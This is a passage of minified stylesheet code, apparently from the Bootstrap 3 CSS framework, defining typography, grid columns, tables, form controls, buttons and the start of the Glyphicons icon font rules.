#eee}.sr-only{position:absolute;width:1px;height:1px;padding:0;margin:-1px;overflow:hidden;clip:rect(0 0 0 0);border:0}p{margin:0 0 10px}.lead{margin-bottom:20px;font-size:16.099999999999998px;font-weight:200;line-height:1.4}@media(min-width:768px){.lead{font-size:21px}}small{font-size:85%}cite{font-style:normal}.text-muted{color:#999}.text-primary{color:#428bca}.text-warning{color:#c09853}.text-danger{color:#b94a48}.text-success{color:#468847}.text-info{color:#3a87ad}.text-left{text-align:left}.text-right{text-align:right}.text-center{text-align:center}h1,h2,h3,h4,h5,h6,.h1,.h2,.h3,.h4,.h5,.h6{font-family:"Helvetica Neue",Helvetica,Arial,sans-serif;font-weight:500;line-height:1.1}h1 small,h2 small,h3 small,h4 small,h5 small,h6 small,.h1 small,.h2 small,.h3 small,.h4 small,.h5 small,.h6 small{font-weight:normal;line-height:1;color:#999}h1,h2,h3{margin-top:20px;margin-bottom:10px}h4,h5,h6{margin-top:10px;margin-bottom:10px}h1,.h1{font-size:36px}h2,.h2{font-size:30px}h3,.h3{font-size:24px}h4,.h4{font-size:18px}h5,.h5{font-size:14px}h6,.h6{font-size:12px}h1 small,.h1 small{font-size:24px}h2 small,.h2 small{font-size:18px}h3 small,.h3 small,h4 small,.h4 small{font-size:14px}.page-header{padding-bottom:9px;margin:40px 0 20px;border-bottom:1px solid #eee}ul,ol{margin-top:0;margin-bottom:10px}ul ul,ol ul,ul ol,ol ol{margin-bottom:0}.list-unstyled{padding-left:0;list-style:none}.list-inline{padding-left:0;list-style:none}.list-inline>li{display:inline-block;padding-right:5px;padding-left:5px}dl{margin-bottom:20px}dt,dd{line-height:1.428571429}dt{font-weight:bold}dd{margin-left:0}@media(min-width:768px){.dl-horizontal dt{float:left;width:160px;overflow:hidden;clear:left;text-align:right;text-overflow:ellipsis;white-space:nowrap}.dl-horizontal dd{margin-left:180px}.dl-horizontal dd:before,.dl-horizontal dd:after{display:table;content:" "}.dl-horizontal dd:after{clear:both}.dl-horizontal dd:before,.dl-horizontal dd:after{display:table;content:" "}.dl-horizontal dd:after{clear:both}}abbr[title],abbr[data-original-title]{cursor:help;border-bottom:1px dotted #999}abbr.initialism{font-size:90%;text-transform:uppercase}blockquote{padding:10px 20px;margin:0 0 20px;border-left:5px solid #eee}blockquote p{font-size:17.5px;font-weight:300;line-height:1.25}blockquote p:last-child{margin-bottom:0}blockquote small{display:block;line-height:1.428571429;color:#999}blockquote small:before{content:'\2014 \00A0'}blockquote.pull-right{padding-right:15px;padding-left:0;border-right:5px solid #eee;border-left:0}blockquote.pull-right p,blockquote.pull-right small{text-align:right}blockquote.pull-right small:before{content:''}blockquote.pull-right small:after{content:'\00A0 \2014'}q:before,q:after,blockquote:before,blockquote:after{content:""}address{display:block;margin-bottom:20px;font-style:normal;line-height:1.428571429}code,pre{font-family:Monaco,Menlo,Consolas,"Courier New",monospace}code{padding:2px 4px;font-size:90%;color:#c7254e;white-space:nowrap;background-color:#f9f2f4;border-radius:4px}pre{display:block;padding:9.5px;margin:0 0 10px;font-size:13px;line-height:1.428571429;color:#333;word-break:break-all;word-wrap:break-word;background-color:#f5f5f5;border:1px solid #ccc;border-radius:4px}pre.prettyprint{margin-bottom:20px}pre code{padding:0;font-size:inherit;color:inherit;white-space:pre-wrap;background-color:transparent;border:0}.pre-scrollable{max-height:340px;overflow-y:scroll}.container{padding-right:15px;padding-left:15px;margin-right:auto;margin-left:auto}.container:before,.container:after{display:table;content:" "}.container:after{clear:both}.container:before,.container:after{display:table;content:" "}.container:after{clear:both}.row{margin-right:-15px;margin-left:-15px}.row:before,.row:after{display:table;content:" "}.row:after{clear:both}.row:before,.row:after{display:table;content:" "}.row:after{clear:both}.col-xs-1,.col-xs-2,.col-xs-3,.col-xs-4,.col-xs-5,.col-xs-6,.col-xs-7,.col-xs-8,.col-xs-9,.col-xs-10,.col-xs-11,.col-xs-12,.col-sm-1,.col-sm-2,.col-sm-3,.col-sm-4,.col-sm-5,.col-sm-6,.col-sm-7,.col-sm-8,.col-sm-9,.col-sm-10,.col-sm-11,.col-sm-12,.col-md-1,.col-md-2,.col-md-3,.col-md-4,.col-md-5,.col-md-6,.col-md-7,.col-md-8,.col-md-9,.col-md-10,.col-md-11,.col-md-12,.col-lg-1,.col-lg-2,.col-lg-3,.col-lg-4,.col-lg-5,.col-lg-6,.col-lg-7,.col-lg-8,.col-lg-9,.col-lg-10,.col-lg-11,.col-lg-12{position:relative;min-height:1px;padding-right:15px;padding-left:15px}.col-xs-1,.col-xs-2,.col-xs-3,.col-xs-4,.col-xs-5,.col-xs-6,.col-xs-7,.col-xs-8,.col-xs-9,.col-xs-10,.col-xs-11{float:left}.col-xs-1{width:8.333333333333332%}.col-xs-2{width:16.666666666666664%}.col-xs-3{width:25%}.col-xs-4{width:33.33333333333333%}.col-xs-5{width:41.66666666666667%}.col-xs-6{width:50%}.col-xs-7{width:58.333333333333336%}.col-xs-8{width:66.66666666666666%}.col-xs-9{width:75%}.col-xs-10{width:83.33333333333334%}.col-xs-11{width:91.66666666666666%}.col-xs-12{width:100%}@media(min-width:768px){.container{max-width:750px}.col-sm-1,.col-sm-2,.col-sm-3,.col-sm-4,.col-sm-5,.col-sm-6,.col-sm-7,.col-sm-8,.col-sm-9,.col-sm-10,.col-sm-11{float:left}.col-sm-1{width:8.333333333333332%}.col-sm-2{width:16.666666666666664%}.col-sm-3{width:25%}.col-sm-4{width:33.33333333333333%}.col-sm-5{width:41.66666666666667%}.col-sm-6{width:50%}.col-sm-7{width:58.333333333333336%}.col-sm-8{width:66.66666666666666%}.col-sm-9{width:75%}.col-sm-10{width:83.33333333333334%}.col-sm-11{width:91.66666666666666%}.col-sm-12{width:100%}.col-sm-push-1{left:8.333333333333332%}.col-sm-push-2{left:16.666666666666664%}.col-sm-push-3{left:25%}.col-sm-push-4{left:33.33333333333333%}.col-sm-push-5{left:41.66666666666667%}.col-sm-push-6{left:50%}.col-sm-push-7{left:58.333333333333336%}.col-sm-push-8{left:66.66666666666666%}.col-sm-push-9{left:75%}.col-sm-push-10{left:83.33333333333334%}.col-sm-push-11{left:91.66666666666666%}.col-sm-pull-1{right:8.333333333333332%}.col-sm-pull-2{right:16.666666666666664%}.col-sm-pull-3{right:25%}.col-sm-pull-4{right:33.33333333333333%}.col-sm-pull-5{right:41.66666666666667%}.col-sm-pull-6{right:50%}.col-sm-pull-7{right:58.333333333333336%}.col-sm-pull-8{right:66.66666666666666%}.col-sm-pull-9{right:75%}.col-sm-pull-10{right:83.33333333333334%}.col-sm-pull-11{right:91.66666666666666%}.col-sm-offset-1{margin-left:8.333333333333332%}.col-sm-offset-2{margin-left:16.666666666666664%}.col-sm-offset-3{margin-left:25%}.col-sm-offset-4{margin-left:33.33333333333333%}.col-sm-offset-5{margin-left:41.66666666666667%}.col-sm-offset-6{margin-left:50%}.col-sm-offset-7{margin-left:58.333333333333336%}.col-sm-offset-8{margin-left:66.66666666666666%}.col-sm-offset-9{margin-left:75%}.col-sm-offset-10{margin-left:83.33333333333334%}.col-sm-offset-11{margin-left:91.66666666666666%}}@media(min-width:992px){.container{max-width:970px}.col-md-1,.col-md-2,.col-md-3,.col-md-4,.col-md-5,.col-md-6,.col-md-7,.col-md-8,.col-md-9,.col-md-10,.col-md-11{float:left}.col-md-1{width:8.333333333333332%}.col-md-2{width:16.666666666666664%}.col-md-3{width:25%}.col-md-4{width:33.33333333333333%}.col-md-5{width:41.66666666666667%}.col-md-6{width:50%}.col-md-7{width:58.333333333333336%}.col-md-8{width:66.66666666666666%}.col-md-9{width:75%}.col-md-10{width:83.33333333333334%}.col-md-11{width:91.66666666666666%}.col-md-12{width:100%}.col-md-push-0{left:auto}.col-md-push-1{left:8.333333333333332%}.col-md-push-2{left:16.666666666666664%}.col-md-push-3{left:25%}.col-md-push-4{left:33.33333333333333%}.col-md-push-5{left:41.66666666666667%}.col-md-push-6{left:50%}.col-md-push-7{left:58.333333333333336%}.col-md-push-8{left:66.66666666666666%}.col-md-push-9{left:75%}.col-md-push-10{left:83.33333333333334%}.col-md-push-11{left:91.66666666666666%}.col-md-pull-0{right:auto}.col-md-pull-1{right:8.333333333333332%}.col-md-pull-2{right:16.666666666666664%}.col-md-pull-3{right:25%}.col-md-pull-4{right:33.33333333333333%}.col-md-pull-5{right:41.66666666666667%}.col-md-pull-6{right:50%}.col-md-pull-7{right:58.333333333333336%}.col-md-pull-8{right:66.66666666666666%}.col-md-pull-9{right:75%}.col-md-pull-10{right:83.33333333333334%}.col-md-pull-11{right:91.66666666666666%}.col-md-offset-0{margin-left:0}.col-md-offset-1{margin-left:8.333333333333332%}.col-md-offset-2{margin-left:16.666666666666664%}.col-md-offset-3{margin-left:25%}.col-md-offset-4{margin-left:33.33333333333333%}.col-md-offset-5{margin-left:41.66666666666667%}.col-md-offset-6{margin-left:50%}.col-md-offset-7{margin-left:58.333333333333336%}.col-md-offset-8{margin-left:66.66666666666666%}.col-md-offset-9{margin-left:75%}.col-md-offset-10{margin-left:83.33333333333334%}.col-md-offset-11{margin-left:91.66666666666666%}}@media(min-width:1200px){.container{max-width:1170px}.col-lg-1,.col-lg-2,.col-lg-3,.col-lg-4,.col-lg-5,.col-lg-6,.col-lg-7,.col-lg-8,.col-lg-9,.col-lg-10,.col-lg-11{float:left}.col-lg-1{width:8.333333333333332%}.col-lg-2{width:16.666666666666664%}.col-lg-3{width:25%}.col-lg-4{width:33.33333333333333%}.col-lg-5{width:41.66666666666667%}.col-lg-6{width:50%}.col-lg-7{width:58.333333333333336%}.col-lg-8{width:66.66666666666666%}.col-lg-9{width:75%}.col-lg-10{width:83.33333333333334%}.col-lg-11{width:91.66666666666666%}.col-lg-12{width:100%}.col-lg-push-0{left:auto}.col-lg-push-1{left:8.333333333333332%}.col-lg-push-2{left:16.666666666666664%}.col-lg-push-3{left:25%}.col-lg-push-4{left:33.33333333333333%}.col-lg-push-5{left:41.66666666666667%}.col-lg-push-6{left:50%}.col-lg-push-7{left:58.333333333333336%}.col-lg-push-8{left:66.66666666666666%}.col-lg-push-9{left:75%}.col-lg-push-10{left:83.33333333333334%}.col-lg-push-11{left:91.66666666666666%}.col-lg-pull-0{right:auto}.col-lg-pull-1{right:8.333333333333332%}.col-lg-pull-2{right:16.666666666666664%}.col-lg-pull-3{right:25%}.col-lg-pull-4{right:33.33333333333333%}.col-lg-pull-5{right:41.66666666666667%}.col-lg-pull-6{right:50%}.col-lg-pull-7{right:58.333333333333336%}.col-lg-pull-8{right:66.66666666666666%}.col-lg-pull-9{right:75%}.col-lg-pull-10{right:83.33333333333334%}.col-lg-pull-11{right:91.66666666666666%}.col-lg-offset-0{margin-left:0}.col-lg-offset-1{margin-left:8.333333333333332%}.col-lg-offset-2{margin-left:16.666666666666664%}.col-lg-offset-3{margin-left:25%}.col-lg-offset-4{margin-left:33.33333333333333%}.col-lg-offset-5{margin-left:41.66666666666667%}.col-lg-offset-6{margin-left:50%}.col-lg-offset-7{margin-left:58.333333333333336%}.col-lg-offset-8{margin-left:66.66666666666666%}.col-lg-offset-9{margin-left:75%}.col-lg-offset-10{margin-left:83.33333333333334%}.col-lg-offset-11{margin-left:91.66666666666666%}}table{max-width:100%;background-color:transparent}th{text-align:left}.table{width:100%;margin-bottom:20px}.table thead>tr>th,.table tbody>tr>th,.table tfoot>tr>th,.table thead>tr>td,.table tbody>tr>td,.table tfoot>tr>td{padding:8px;line-height:1.428571429;vertical-align:top;border-top:1px solid #ddd}.table thead>tr>th{vertical-align:bottom;border-bottom:2px solid #ddd}.table caption+thead tr:first-child th,.table colgroup+thead tr:first-child th,.table thead:first-child tr:first-child th,.table caption+thead tr:first-child td,.table colgroup+thead tr:first-child td,.table thead:first-child tr:first-child td{border-top:0}.table tbody+tbody{border-top:2px solid #ddd}.table .table{background-color:#fff}.table-condensed thead>tr>th,.table-condensed tbody>tr>th,.table-condensed tfoot>tr>th,.table-condensed thead>tr>td,.table-condensed tbody>tr>td,.table-condensed tfoot>tr>td{padding:5px}.table-bordered{border:1px solid #ddd}.table-bordered>thead>tr>th,.table-bordered>tbody>tr>th,.table-bordered>tfoot>tr>th,.table-bordered>thead>tr>td,.table-bordered>tbody>tr>td,.table-bordered>tfoot>tr>td{border:1px solid #ddd}.table-bordered>thead>tr>th,.table-bordered>thead>tr>td{border-bottom-width:2px}.table-striped>tbody>tr:nth-child(odd)>td,.table-striped>tbody>tr:nth-child(odd)>th{background-color:#f9f9f9}.table-hover>tbody>tr:hover>td,.table-hover>tbody>tr:hover>th{background-color:#f5f5f5}table col[class*="col-"]{display:table-column;float:none}table td[class*="col-"],table th[class*="col-"]{display:table-cell;float:none}.table>thead>tr>td.active,.table>tbody>tr>td.active,.table>tfoot>tr>td.active,.table>thead>tr>th.active,.table>tbody>tr>th.active,.table>tfoot>tr>th.active,.table>thead>tr.active>td,.table>tbody>tr.active>td,.table>tfoot>tr.active>td,.table>thead>tr.active>th,.table>tbody>tr.active>th,.table>tfoot>tr.active>th{background-color:#f5f5f5}.table>thead>tr>td.success,.table>tbody>tr>td.success,.table>tfoot>tr>td.success,.table>thead>tr>th.success,.table>tbody>tr>th.success,.table>tfoot>tr>th.success,.table>thead>tr.success>td,.table>tbody>tr.success>td,.table>tfoot>tr.success>td,.table>thead>tr.success>th,.table>tbody>tr.success>th,.table>tfoot>tr.success>th{background-color:#dff0d8;border-color:#d6e9c6}.table-hover>tbody>tr>td.success:hover,.table-hover>tbody>tr>th.success:hover,.table-hover>tbody>tr.success:hover>td{background-color:#d0e9c6;border-color:#c9e2b3}.table>thead>tr>td.danger,.table>tbody>tr>td.danger,.table>tfoot>tr>td.danger,.table>thead>tr>th.danger,.table>tbody>tr>th.danger,.table>tfoot>tr>th.danger,.table>thead>tr.danger>td,.table>tbody>tr.danger>td,.table>tfoot>tr.danger>td,.table>thead>tr.danger>th,.table>tbody>tr.danger>th,.table>tfoot>tr.danger>th{background-color:#f2dede;border-color:#eed3d7}.table-hover>tbody>tr>td.danger:hover,.table-hover>tbody>tr>th.danger:hover,.table-hover>tbody>tr.danger:hover>td{background-color:#ebcccc;border-color:#e6c1c7}.table>thead>tr>td.warning,.table>tbody>tr>td.warning,.table>tfoot>tr>td.warning,.table>thead>tr>th.warning,.table>tbody>tr>th.warning,.table>tfoot>tr>th.warning,.table>thead>tr.warning>td,.table>tbody>tr.warning>td,.table>tfoot>tr.warning>td,.table>thead>tr.warning>th,.table>tbody>tr.warning>th,.table>tfoot>tr.warning>th{background-color:#fcf8e3;border-color:#fbeed5}.table-hover>tbody>tr>td.warning:hover,.table-hover>tbody>tr>th.warning:hover,.table-hover>tbody>tr.warning:hover>td{background-color:#faf2cc;border-color:#f8e5be}@media(max-width:768px){.table-responsive{width:100%;margin-bottom:15px;overflow-x:scroll;overflow-y:hidden;border:1px solid #ddd}.table-responsive>.table{margin-bottom:0;background-color:#fff}.table-responsive>.table>thead>tr>th,.table-responsive>.table>tbody>tr>th,.table-responsive>.table>tfoot>tr>th,.table-responsive>.table>thead>tr>td,.table-responsive>.table>tbody>tr>td,.table-responsive>.table>tfoot>tr>td{white-space:nowrap}.table-responsive>.table-bordered{border:0}.table-responsive>.table-bordered>thead>tr>th:first-child,.table-responsive>.table-bordered>tbody>tr>th:first-child,.table-responsive>.table-bordered>tfoot>tr>th:first-child,.table-responsive>.table-bordered>thead>tr>td:first-child,.table-responsive>.table-bordered>tbody>tr>td:first-child,.table-responsive>.table-bordered>tfoot>tr>td:first-child{border-left:0}.table-responsive>.table-bordered>thead>tr>th:last-child,.table-responsive>.table-bordered>tbody>tr>th:last-child,.table-responsive>.table-bordered>tfoot>tr>th:last-child,.table-responsive>.table-bordered>thead>tr>td:last-child,.table-responsive>.table-bordered>tbody>tr>td:last-child,.table-responsive>.table-bordered>tfoot>tr>td:last-child{border-right:0}.table-responsive>.table-bordered>thead>tr:last-child>th,.table-responsive>.table-bordered>tbody>tr:last-child>th,.table-responsive>.table-bordered>tfoot>tr:last-child>th,.table-responsive>.table-bordered>thead>tr:last-child>td,.table-responsive>.table-bordered>tbody>tr:last-child>td,.table-responsive>.table-bordered>tfoot>tr:last-child>td{border-bottom:0}}fieldset{padding:0;margin:0;border:0}legend{display:block;width:100%;padding:0;margin-bottom:20px;font-size:21px;line-height:inherit;color:#333;border:0;border-bottom:1px solid #e5e5e5}label{display:inline-block;margin-bottom:5px;font-weight:bold}input[type="search"]{-webkit-box-sizing:border-box;-moz-box-sizing:border-box;box-sizing:border-box}input[type="radio"],input[type="checkbox"]{margin:4px 0 0;margin-top:1px \9;line-height:normal}input[type="file"]{display:block}select[multiple],select[size]{height:auto}select optgroup{font-family:inherit;font-size:inherit;font-style:inherit}input[type="file"]:focus,input[type="radio"]:focus,input[type="checkbox"]:focus{outline:thin dotted #333;outline:5px auto -webkit-focus-ring-color;outline-offset:-2px}input[type="number"]::-webkit-outer-spin-button,input[type="number"]::-webkit-inner-spin-button{height:auto}.form-control:-moz-placeholder{color:#999}.form-control::-moz-placeholder{color:#999}.form-control:-ms-input-placeholder{color:#999}.form-control::-webkit-input-placeholder{color:#999}.form-control{display:block;width:100%;height:34px;padding:6px 12px;font-size:14px;line-height:1.428571429;color:#555;vertical-align:middle;background-color:#fff;border:1px solid #ccc;border-radius:4px;-webkit-box-shadow:inset 0 1px 1px rgba(0,0,0,0.075);box-shadow:inset 0 1px 1px rgba(0,0,0,0.075);-webkit-transition:border-color ease-in-out .15s,box-shadow ease-in-out .15s;transition:border-color ease-in-out .15s,box-shadow ease-in-out .15s}.form-control:focus{border-color:#66afe9;outline:0;-webkit-box-shadow:inset 0 1px 1px rgba(0,0,0,0.075),0 0 8px rgba(102,175,233,0.6);box-shadow:inset 0 1px 1px rgba(0,0,0,0.075),0 0 8px rgba(102,175,233,0.6)}.form-control[disabled],.form-control[readonly],fieldset[disabled] .form-control{cursor:not-allowed;background-color:#eee}textarea.form-control{height:auto}.form-group{margin-bottom:15px}.radio,.checkbox{display:block;min-height:20px;padding-left:20px;margin-top:10px;margin-bottom:10px;vertical-align:middle}.radio label,.checkbox label{display:inline;margin-bottom:0;font-weight:normal;cursor:pointer}.radio input[type="radio"],.radio-inline input[type="radio"],.checkbox input[type="checkbox"],.checkbox-inline input[type="checkbox"]{float:left;margin-left:-20px}.radio+.radio,.checkbox+.checkbox{margin-top:-5px}.radio-inline,.checkbox-inline{display:inline-block;padding-left:20px;margin-bottom:0;font-weight:normal;vertical-align:middle;cursor:pointer}.radio-inline+.radio-inline,.checkbox-inline+.checkbox-inline{margin-top:0;margin-left:10px}input[type="radio"][disabled],input[type="checkbox"][disabled],.radio[disabled],.radio-inline[disabled],.checkbox[disabled],.checkbox-inline[disabled],fieldset[disabled] input[type="radio"],fieldset[disabled] input[type="checkbox"],fieldset[disabled] .radio,fieldset[disabled] .radio-inline,fieldset[disabled] .checkbox,fieldset[disabled] .checkbox-inline{cursor:not-allowed}.input-sm{height:30px;padding:5px 10px;font-size:12px;line-height:1.5;border-radius:3px}select.input-sm{height:30px;line-height:30px}textarea.input-sm{height:auto}.input-lg{height:45px;padding:10px 16px;font-size:18px;line-height:1.33;border-radius:6px}select.input-lg{height:45px;line-height:45px}textarea.input-lg{height:auto}.has-warning .help-block,.has-warning .control-label{color:#c09853}.has-warning .form-control{border-color:#c09853;-webkit-box-shadow:inset 0 1px 1px rgba(0,0,0,0.075);box-shadow:inset 0 1px 1px rgba(0,0,0,0.075)}.has-warning .form-control:focus{border-color:#a47e3c;-webkit-box-shadow:inset 0 1px 1px rgba(0,0,0,0.075),0 0 6px #dbc59e;box-shadow:inset 0 1px 1px rgba(0,0,0,0.075),0 0 6px #dbc59e}.has-warning .input-group-addon{color:#c09853;background-color:#fcf8e3;border-color:#c09853}.has-error .help-block,.has-error .control-label{color:#b94a48}.has-error .form-control{border-color:#b94a48;-webkit-box-shadow:inset 0 1px 1px rgba(0,0,0,0.075);box-shadow:inset 0 1px 1px rgba(0,0,0,0.075)}.has-error .form-control:focus{border-color:#953b39;-webkit-box-shadow:inset 0 1px 1px rgba(0,0,0,0.075),0 0 6px #d59392;box-shadow:inset 0 1px 1px rgba(0,0,0,0.075),0 0 6px #d59392}.has-error .input-group-addon{color:#b94a48;background-color:#f2dede;border-color:#b94a48}.has-success .help-block,.has-success .control-label{color:#468847}.has-success .form-control{border-color:#468847;-webkit-box-shadow:inset 0 1px 1px rgba(0,0,0,0.075);box-shadow:inset 0 1px 1px rgba(0,0,0,0.075)}.has-success .form-control:focus{border-color:#356635;-webkit-box-shadow:inset 0 1px 1px rgba(0,0,0,0.075),0 0 6px #7aba7b;box-shadow:inset 0 1px 1px rgba(0,0,0,0.075),0 0 6px #7aba7b}.has-success .input-group-addon{color:#468847;background-color:#dff0d8;border-color:#468847}.form-control-static{padding-top:7px;margin-bottom:0}.help-block{display:block;margin-top:5px;margin-bottom:10px;color:#737373}@media(min-width:768px){.form-inline .form-group{display:inline-block;margin-bottom:0;vertical-align:middle}.form-inline .form-control{display:inline-block}.form-inline .radio,.form-inline .checkbox{display:inline-block;padding-left:0;margin-top:0;margin-bottom:0}.form-inline .radio input[type="radio"],.form-inline .checkbox input[type="checkbox"]{float:none;margin-left:0}}.form-horizontal .control-label,.form-horizontal .radio,.form-horizontal .checkbox,.form-horizontal .radio-inline,.form-horizontal .checkbox-inline{padding-top:7px;margin-top:0;margin-bottom:0}.form-horizontal .form-group{margin-right:-15px;margin-left:-15px}.form-horizontal .form-group:before,.form-horizontal .form-group:after{display:table;content:" "}.form-horizontal .form-group:after{clear:both}.form-horizontal .form-group:before,.form-horizontal .form-group:after{display:table;content:" "}.form-horizontal .form-group:after{clear:both}@media(min-width:768px){.form-horizontal .control-label{text-align:right}}.btn{display:inline-block;padding:6px 12px;margin-bottom:0;font-size:14px;font-weight:normal;line-height:1.428571429;text-align:center;white-space:nowrap;vertical-align:middle;cursor:pointer;border:1px solid transparent;border-radius:4px;-webkit-user-select:none;-moz-user-select:none;-ms-user-select:none;-o-user-select:none;user-select:none}.btn:focus{outline:thin dotted #333;outline:5px auto -webkit-focus-ring-color;outline-offset:-2px}.btn:hover,.btn:focus{color:#333;text-decoration:none}.btn:active,.btn.active{background-image:none;outline:0;-webkit-box-shadow:inset 0 3px 5px rgba(0,0,0,0.125);box-shadow:inset 0 3px 5px rgba(0,0,0,0.125)}.btn.disabled,.btn[disabled],fieldset[disabled] .btn{pointer-events:none;cursor:not-allowed;opacity:.65;filter:alpha(opacity=65);-webkit-box-shadow:none;box-shadow:none}.btn-default{color:#333;background-color:#fff;border-color:#ccc}.btn-default:hover,.btn-default:focus,.btn-default:active,.btn-default.active,.open .dropdown-toggle.btn-default{color:#333;background-color:#ebebeb;border-color:#adadad}.btn-default:active,.btn-default.active,.open .dropdown-toggle.btn-default{background-image:none}.btn-default.disabled,.btn-default[disabled],fieldset[disabled] .btn-default,.btn-default.disabled:hover,.btn-default[disabled]:hover,fieldset[disabled] .btn-default:hover,.btn-default.disabled:focus,.btn-default[disabled]:focus,fieldset[disabled] .btn-default:focus,.btn-default.disabled:active,.btn-default[disabled]:active,fieldset[disabled] .btn-default:active,.btn-default.disabled.active,.btn-default[disabled].active,fieldset[disabled] .btn-default.active{background-color:#fff;border-color:#ccc}.btn-primary{color:#fff;background-color:#428bca;border-color:#357ebd}.btn-primary:hover,.btn-primary:focus,.btn-primary:active,.btn-primary.active,.open .dropdown-toggle.btn-primary{color:#fff;background-color:#3276b1;border-color:#285e8e}.btn-primary:active,.btn-primary.active,.open .dropdown-toggle.btn-primary{background-image:none}.btn-primary.disabled,.btn-primary[disabled],fieldset[disabled] .btn-primary,.btn-primary.disabled:hover,.btn-primary[disabled]:hover,fieldset[disabled] .btn-primary:hover,.btn-primary.disabled:focus,.btn-primary[disabled]:focus,fieldset[disabled] .btn-primary:focus,.btn-primary.disabled:active,.btn-primary[disabled]:active,fieldset[disabled] .btn-primary:active,.btn-primary.disabled.active,.btn-primary[disabled].active,fieldset[disabled] .btn-primary.active{background-color:#428bca;border-color:#357ebd}.btn-warning{color:#fff;background-color:#f0ad4e;border-color:#eea236}.btn-warning:hover,.btn-warning:focus,.btn-warning:active,.btn-warning.active,.open .dropdown-toggle.btn-warning{color:#fff;background-color:#ed9c28;border-color:#d58512}.btn-warning:active,.btn-warning.active,.open .dropdown-toggle.btn-warning{background-image:none}.btn-warning.disabled,.btn-warning[disabled],fieldset[disabled] .btn-warning,.btn-warning.disabled:hover,.btn-warning[disabled]:hover,fieldset[disabled] .btn-warning:hover,.btn-warning.disabled:focus,.btn-warning[disabled]:focus,fieldset[disabled] .btn-warning:focus,.btn-warning.disabled:active,.btn-warning[disabled]:active,fieldset[disabled] .btn-warning:active,.btn-warning.disabled.active,.btn-warning[disabled].active,fieldset[disabled] .btn-warning.active{background-color:#f0ad4e;border-color:#eea236}.btn-danger{color:#fff;background-color:#d9534f;border-color:#d43f3a}.btn-danger:hover,.btn-danger:focus,.btn-danger:active,.btn-danger.active,.open .dropdown-toggle.btn-danger{color:#fff;background-color:#d2322d;border-color:#ac2925}.btn-danger:active,.btn-danger.active,.open .dropdown-toggle.btn-danger{background-image:none}.btn-danger.disabled,.btn-danger[disabled],fieldset[disabled] .btn-danger,.btn-danger.disabled:hover,.btn-danger[disabled]:hover,fieldset[disabled] .btn-danger:hover,.btn-danger.disabled:focus,.btn-danger[disabled]:focus,fieldset[disabled] .btn-danger:focus,.btn-danger.disabled:active,.btn-danger[disabled]:active,fieldset[disabled] .btn-danger:active,.btn-danger.disabled.active,.btn-danger[disabled].active,fieldset[disabled] .btn-danger.active{background-color:#d9534f;border-color:#d43f3a}.btn-success{color:#fff;background-color:#5cb85c;border-color:#4cae4c}.btn-success:hover,.btn-success:focus,.btn-success:active,.btn-success.active,.open .dropdown-toggle.btn-success{color:#fff;background-color:#47a447;border-color:#398439}.btn-success:active,.btn-success.active,.open .dropdown-toggle.btn-success{background-image:none}.btn-success.disabled,.btn-success[disabled],fieldset[disabled] .btn-success,.btn-success.disabled:hover,.btn-success[disabled]:hover,fieldset[disabled] .btn-success:hover,.btn-success.disabled:focus,.btn-success[disabled]:focus,fieldset[disabled] .btn-success:focus,.btn-success.disabled:active,.btn-success[disabled]:active,fieldset[disabled] .btn-success:active,.btn-success.disabled.active,.btn-success[disabled].active,fieldset[disabled] .btn-success.active{background-color:#5cb85c;border-color:#4cae4c}.btn-info{color:#fff;background-color:#5bc0de;border-color:#46b8da}.btn-info:hover,.btn-info:focus,.btn-info:active,.btn-info.active,.open .dropdown-toggle.btn-info{color:#fff;background-color:#39b3d7;border-color:#269abc}.btn-info:active,.btn-info.active,.open .dropdown-toggle.btn-info{background-image:none}.btn-info.disabled,.btn-info[disabled],fieldset[disabled] .btn-info,.btn-info.disabled:hover,.btn-info[disabled]:hover,fieldset[disabled] .btn-info:hover,.btn-info.disabled:focus,.btn-info[disabled]:focus,fieldset[disabled] .btn-info:focus,.btn-info.disabled:active,.btn-info[disabled]:active,fieldset[disabled] .btn-info:active,.btn-info.disabled.active,.btn-info[disabled].active,fieldset[disabled] .btn-info.active{background-color:#5bc0de;border-color:#46b8da}.btn-link{font-weight:normal;color:#428bca;cursor:pointer;border-radius:0}.btn-link,.btn-link:active,.btn-link[disabled],fieldset[disabled] .btn-link{background-color:transparent;-webkit-box-shadow:none;box-shadow:none}.btn-link,.btn-link:hover,.btn-link:focus,.btn-link:active{border-color:transparent}.btn-link:hover,.btn-link:focus{color:#2a6496;text-decoration:underline;background-color:transparent}.btn-link[disabled]:hover,fieldset[disabled] .btn-link:hover,.btn-link[disabled]:focus,fieldset[disabled] .btn-link:focus{color:#999;text-decoration:none}.btn-lg{padding:10px 16px;font-size:18px;line-height:1.33;border-radius:6px}.btn-sm,.btn-xs{padding:5px 10px;font-size:12px;line-height:1.5;border-radius:3px}.btn-xs{padding:1px 5px}.btn-block{display:block;width:100%;padding-right:0;padding-left:0}.btn-block+.btn-block{margin-top:5px}input[type="submit"].btn-block,input[type="reset"].btn-block,input[type="button"].btn-block{width:100%}.fade{opacity:0;-webkit-transition:opacity .15s linear;transition:opacity .15s linear}.fade.in{opacity:1}.collapse{display:none}.collapse.in{display:block}.collapsing{position:relative;height:0;overflow:hidden;-webkit-transition:height .35s ease;transition:height .35s ease}@font-face{font-family:'Glyphicons Halflings';src:url('../fonts/glyphicons-halflings-regular.eot');src:url('../fonts/glyphicons-halflings-regular.eot?#iefix') format('embedded-opentype'),url('../fonts/glyphicons-halflings-regular.woff') format('woff'),url('../fonts/glyphicons-halflings-regular.ttf') format('truetype'),url('../fonts/glyphicons-halflings-regular.svg#glyphicons-halflingsregular') format('svg')}.glyphicon{position:relative;top:1px;display:inline-block;font-family:'Glyphicons Halflings';-webkit-font-smoothing:antialiased;font-style:normal;font-weight:normal;line-height:1}.glyphicon-asterisk:before{content:"\2a"}.glyphicon-plus:before{content:"\2b"}.glyphicon-euro:before{content:"\20ac"}.glyphicon-minus:before{content:"\2212"}.glyphicon-cloud:before{content:"\2601"}.glyphicon-envelope:before{content:"\2709"}.glyphicon-pencil:before{content:"\270f"}.glyphicon-glass:before{content:"\e001"}.glyphicon-music:before{content:"\e002"}.glyphicon-search:before{content:"\e003"}.glyphicon-heart:before{content:"\e005"}.glyphicon-star:before{content:"\e006"}.glyphicon-star-empty:before{content:"\e007"}.glyphicon-user:before{content:"\e008"}.glyphicon-film:before{content:"\e009"}.glyphicon-th-large:before{content:"\e010"}.glyphicon-th:before{content:"\e011"}.glyphicon-th-list:before{content:"\e012"}.glyphicon-ok:before{content:"\e013"}.glyphicon-remove:before{content:"\e014"}.glyphicon-zoom-in:before{content:"\e015"}.glyphicon-zoom-out:before{content:"\e016"}.glyphicon-off:before{content:"\e017"}.glyphicon-signal:before{content:"\e01